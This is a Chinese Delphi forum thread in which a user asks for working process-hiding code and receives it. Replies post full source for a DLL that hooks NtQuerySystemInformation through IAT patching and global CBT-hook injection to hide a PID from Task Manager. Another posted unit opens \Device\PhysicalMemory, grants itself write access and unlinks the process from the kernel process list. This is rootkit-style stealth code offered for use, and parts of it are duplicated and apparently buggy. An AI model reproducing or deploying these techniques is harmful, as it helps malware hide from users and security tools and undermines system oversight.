谁有进程隐藏的代码 在网上找了半天 都不好用
解决方案 »
- Delphi 数据库的问题
- 为了写个自己用的闹钟......请教简单易懂代码!
- ClientDataSet中怎么控制自动增加字段的?
- 现在开发一个组件,组件中有一个类,类中有一个变量,该变量根据运行时的情况不同而不同,在组件中的另外一个文件中(unit),访问该类中
- 在delphi如何实现拨号
- 江湖救急
- 简单DBGrid问题,在线等侯,解决就结贴!!
- 急!!:VB编的OCX,DLL库为什么在DEHPI中引用时出错?(答对者最少给100分,另外我还会另开贴给大分)
- 在Delphi中用BDE能不能够连接Access?
- 征集Delphi爱好者的E-Mail,不管你是爱好者还是高手请写出你的E-Mail最好还加上QQ,以便大家交流!
- 请教图片处理的几个小问题?
- 请教一个Tlist的问题
虽然没隐藏 但也能糊弄一下 呵呵
http://www.2ccc.com/article.asp?articleid=3763
这个或许对你有帮助,但是程序杀毒报的厉害。(下次多开点嘛。。)
可以上msn:[email protected]
Windows,
ImageHlp,
TlHelp32;type SYSTEM_INFORMATION_CLASS = (
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
);_IMAGE_IMPORT_DESCRIPTOR = packed record
case integer of
0:(Characteristics: DWORD);
1:(OriginalFirstThunk:DWORD; TimeDateStamp:DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD);
end;
IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;PFARPROC=^FARPROC;procedure ReplaceIATEntryInOneMod(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);
var
ulSize: ULONG;
pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;
pszModName: PChar;
pThunk: PDWORD; ppfn:PFARPROC;
ffound: LongBool;
written: DWORD;
begin
pImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
if pImportDesc = nil then
exit;
while pImportDesc.Name <> 0 do begin
pszModName := PChar(hmodCaller + pImportDesc.Name);
if (lstrcmpiA(pszModName, pszCallerModName) = 0) then
break;
Inc(pImportDesc);
end;
if (pImportDesc.Name = 0) then
exit;
pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
while pThunk^ <> 0 do begin
ppfn := PFARPROC(pThunk);
fFound := (ppfn^ = pfnCurrent);
if (fFound) then begin
VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
exit;
end;
Inc(pThunk);
end;
end;var
addr_NtQuerySystemInformation: Pointer;
mypid: DWORD;
fname: PCHAR;
mapaddr: PDWORD;
hideOnlyTaskMan: PBOOL;function myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;
SystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;
label onceagain, getnextpidstruct, quit, fillzero;
asm
push ReturnLength
push SystemInformationLength
push SystemInformation
push dword ptr SystemInformationClass
call dword ptr [addr_NtQuerySystemInformation]
or eax,eax
jl quit
cmp SystemInformationClass, SystemProcessesAndThreadsInformation
jne quit onceagain:
mov esi, SystemInformation getnextpidstruct:
mov ebx, esi
cmp dword ptr [esi],0
je quit
add esi, [esi]
mov ecx, [esi+44h]
cmp ecx, mypid
jne getnextpidstruct
mov edx, [esi]
test edx, edx
je fillzero
add [ebx], edx
jmp onceagain fillzero:
and [ebx], edx
jmp onceagain quit:
mov Result, eax
end;procedure InterceptFunctions;
var
hSnapShot: THandle;
me32: MODULEENTRY32;
begin
addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
if hSnapshot=INVALID_HANDLE_VALUE then
exit;
try
ZeroMemory(@me32,sizeof(MODULEENTRY32));
me32.dwSize:=sizeof(MODULEENTRY32);
Module32First(hSnapShot,me32);
repeat
ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);
until not Module32Next(hSnapShot,me32);
finally
CloseHandle(hSnapShot);
end;
end;procedure UninterceptFunctions;
var
hSnapShot: THandle;
me32: MODULEENTRY32;
begin
addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
if hSnapshot=INVALID_HANDLE_VALUE then exit;
try
ZeroMemory(@me32,sizeof(MODULEENTRY32));
me32.dwSize:=sizeof(MODULEENTRY32);
Module32First(hSnapShot,me32);
repeat
ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);
until not Module32Next(hSnapShot,me32);
finally
CloseHandle(hSnapShot);
end;
end;
var HookHandle: THandle;function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;
begin
Result:=0;
end;procedure InstallHook; stdcall;
begin
HookHandle := SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);
end;var hFirstMapHandle:THandle;procedure HideProcess(pid:DWORD); stdcall;
var
addrMap: PDWORD;
ptr2: PBOOL;
begin
mypid:=0;
hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');
if hFirstMapHandle=0 then
exit;
addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);
if addrMap=nil then begin
CloseHandle(hFirstMapHandle);
exit;
end;
addrMap^:=pid;
ptr2:=PBOOL(DWORD(addrMap)+4);
ptr2^:= false;
UnmapViewOfFile(addrMap);
InstallHook;
end;exports
HideProcess;var
hmap: THandle;procedure LibraryProc(Reason: Integer);
begin
if Reason = DLL_PROCESS_DETACH then
if mypid > 0 then
UninterceptFunctions()
else
CloseHandle(hFirstMapHandle);
end;function ExtractFileName(APath:string): string;
var
LI,LJ: Integer;
begin
if Length(APath)<>0 then begin
LJ:=0;
for LI:=Length(APath) downto 1 do
if APath[LI]='\' then begin
LJ:=LI;
Break;
end;
Result:=Copy(APath,LJ+1,MaxInt);
end
else
Result := '';
end;function AllocMem(Size: Cardinal): Pointer;
begin
GetMem(Result, Size);
FillChar(Result^, Size, 0);
end;begin
hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
if hmap=0 then
exit;
try
mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
if mapaddr=nil then
exit;
mypid:=mapaddr^;
hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
if hideOnlyTaskMan^ then begin
fname:=allocMem(MAX_PATH+1);
GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
if not (ExtractFileName(fname)='taskmgr.exe') then
exit;
end;
InterceptFunctions;
finally
UnmapViewOfFile(mapaddr);
CloseHandle(Hmap);
DLLProc:=@LibraryProc;
end;
end.program load;
uses windows;
var
VHideProcess:procedure(pid:DWORD); stdcall;
procedure HideProcess(pid:DWORD); stdcall;
var
hget:THandle;
begin
hget := LoadLibrary('lhide.dll');
@VHideProcess := GetProcAddress(hget, 'HideProcess');
VHideProcess(pid);
end;
begin
HideProcess(GetCurrentProcessId);
while True do Sleep(1);
end.
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;
type
NTSTATUS=Longint;
USHORT =Byte;
PWSTR=PWidechar;
ULONG= Cardinal;
HANDLE=Pointer;
PVOID=Pointer;
PCWSTR=PWidechar;
PULONG=^ULONG ;
HMODULE=THANDLE;const
STATUS_ACCESS_DENIED = $C0000022 ;
RSP_SIMPLE_SERVICE = $00000001;
RSP_UNREGISTER_SERVICE = $00000000 ;
type
_UNICODE_STRING= record
Length:USHORT ;
MaximumLength: USHORT;
Buffer:PWSTR;
end;
UNICODE_STRING= _UNICODE_STRING;
PUNICODE_STRING =^ _UNICODE_STRING ;_OBJECT_ATTRIBUTES =record
Length:ULONG ;
RootDirectory:HANDLE;
ObjectName:PUNICODE_STRING;
Attributes:ULONG;
SecurityDescriptor:PVOID;
SecurityQualityOfService:PVOID ;
end;
OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES; ZWOPENSECTION=function(
SectionHandle:PInteger;
DesiredAccess:ACCESS_MASK;
ObjectAttributes :POBJECT_ATTRIBUTES
): NTSTATUS; stdcall;
RTLINITUNICODESTRING=procedure(
DestinationString:PUNICODE_STRING;
SourceString :PCWSTR
);stdcall;TMyHideProcess=class
private
OSversion:Longint;
RtlInitUnicodeString:RTLINITUNICODESTRING ;
ZwOpenSection:ZWOPENSECTION;
g_hNtDLL: HMODULE;
g_pMapPhysicalMemory:PVOID;
g_hMPM :THANDLE ;
function InitNTDLL():bool;
procedure CloseNTDLL();
procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
function OpenPhysicalMemory():THANDLE ;
function LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
function GetData(addr:PVOID ):ULONG;
function SetData( addr:PVOID; data:ULONG):bool;
function HideProcess2000():bool;
procedure HideProcess98();
public
constructor Create( theosver:Longint);
destructor Destroy();
procedure DoHideMe();
end; implementationconstructor TMyHideProcess.Create( theosver:Longint);
begin
OSversion:=theosver;
end;
destructor TMyHideProcess.Destroy();
begin
CloseNTDLL();
end;
procedure TMyHideProcess.DoHideMe();
begin
case (OSversion) of
98:
HideProcess98();
2000:
HideProcess2000();
end;
end; function TMyHideProcess.InitNTDLL():bool;
var
a:Longint;
begin
g_hNtDLL := 0;
g_pMapPhysicalMemory := nil;
g_hMPM := 0;
g_hNtDLL := LoadLibrary( 'ntdll.dll' );
if (g_hNtDLL=0 ) then
begin
result:= FALSE;
exit;
end;
@RtlInitUnicodeString :=
GetProcAddress( g_hNtDLL, 'RtlInitUnicodeString'); @ZwOpenSection :=
GetProcAddress( g_hNtDLL, 'ZwOpenSection'); result:= TRUE;
end;
procedure TMyHideProcess.CloseNTDLL();
begin
if(g_hNtDLL <>0 ) then
begin
FreeLibrary(g_hNtDLL);
end;
end;
procedure TMyHideProcess.SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
label CleanUp;
var
pDacl,pNewDacl: PACL ;
pSD: PPSECURITY_DESCRIPTOR ;
dwRes : DWORD;
ea:EXPLICIT_ACCESS;begin
pDacl:=nil;
pNewDacl :=nil;
pSD:=nil; dwRes:=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
nil,nil,pDacl,nil,pSD); if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end;
ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance:= NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes:=SetEntriesInAcl(1,@ea,pDacl,pNewDacl) ;
if(dwRes<> ERROR_SUCCESS) then
begin
goto CleanUp;
end; dwRes:=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, nil,nil,pNewDacl,nil); if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end; CleanUp: if(pSD<>nil) then
LocalFree(Ulong(pSD));
if(pNewDacl<>nil) then
LocalFree(Ulong(pNewDacl));end; function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
status: NTSTATUS ;
physmemString:UNICODE_STRING;
attributes:OBJECT_ATTRIBUTES;
begin
RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory')); attributes.Length := sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes); if(status = STATUS_ACCESS_DENIED) then
begin
status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
end; if status=0 then
begin
result:= 0;
exit;
end; g_pMapPhysicalMemory := MapViewOfFile(
g_hMPM,
4,
0,
$30000,
$1000); if( g_pMapPhysicalMemory = nil ) then
begin
result:=0;
exit ;
end; result:= g_hMPM;end;
//-------------------------对付数组指针---------------------------------
type
TArrayULONG = array [0..0] of ULONG;
PTArrayULONG= ^TArrayULONG; //----------------------------------------------------------
function TMyHideProcess.LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
var
VAddr,PGDE,PTE,PAddr,tmp:ULONG;
_PGDE:PULONG; begin
VAddr:=ULONG(addr);
PGDE:=PTArrayULONG(BaseAddress)^[VAddr shr 22];
if ((PGDE and 1)<>0) then
begin
tmp:=PGDE and $00000080;
if (tmp<>0) then
begin
PAddr:=(PGDE and $FFC00000)+(VAddr and $003FFFFF);
end
else
begin
PGDE:=ULONG(MapViewOfFile(g_hMPM, 4, 0, PGDE and $fffff000, $1000));
_PGDE:=PULONG(PGDE);
PTE:=PTArrayULONG(_PGDE)^[(VAddr and $003FF000) shr 12];
if ((PTE and 1)<>0) then
begin
PAddr:=(PTE and $FFFFF000)+(VAddr and $00000FFF);
UnmapViewOfFile(PVOID(PGDE));
end
else
begin
result:= 0;
exit;
end;
end;
end
else
begin
result:= 0;
exit;
end;
result:=PVOID(PAddr);
end;
function
TMyHideProcess.GetData(addr:PVOID ):ULONG;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, 4, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:=0;
exit;
end;
ret:=PTArrayULONG(tmp)^[(phys and $FFF) shr 2];
UnmapViewOfFile(tmp);
result:=ret;
end;
function TMyHideProcess.SetData( addr:PVOID; data:ULONG):bool;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:= FALSE;
exit;
end;
PTArrayULONG(tmp)^[(phys and $FFF) shr 2]:=data;
UnmapViewOfFile(tmp);
result:= TRUE;
end; function TMyHideProcess.HideProcess2000():bool;
var
thread, process ,fw ,bw :ULONG;begin
if InitNTDLL() then
begin
if (OpenPhysicalMemory()=0) then
begin
result:= FALSE;
exit;
end;
thread:=GetData(PVOID($FFDFF124));
process:=GetData(PVOID(thread+$22c));
fw:=GetData(PVOID(process+$a0));
bw:=GetData(PVOID(process+$a4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
end;
result:= TRUE;end;
procedure TMyHideProcess.HideProcess98();
type pRegisterService=function (a,b:DWORD):boolean; stdcall;
var
hKernel : HMODULE ;
RegisterService: pRegisterService ;
begin
hKernel := LoadLibrary('kernel32.dll');
if(hKernel>0) then
begin
@RegisterService :=GetProcAddress(hKernel,'RegisterServiceProcess');
RegisterService(GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
FreeLibrary(hKernel);
hKernel :=0;
end;
end; end.
function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
status: NTSTATUS ;
physmemString:UNICODE_STRING;
attributes:OBJECT_ATTRIBUTES;
begin
RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));attributes.Length := sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes); if(status = STATUS_ACCESS_DENIED) then
begin
status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
end; if status=0 then
begin
result:= 0;
exit;
end; g_pMapPhysicalMemory := MapViewOfFile(
g_hMPM,
4,
0,
$30000,
$1000); if( g_pMapPhysicalMemory = nil ) then
begin
result:=0;
exit ;
end; result:= g_hMPM;end;
楼上的在不
红色的编译不过去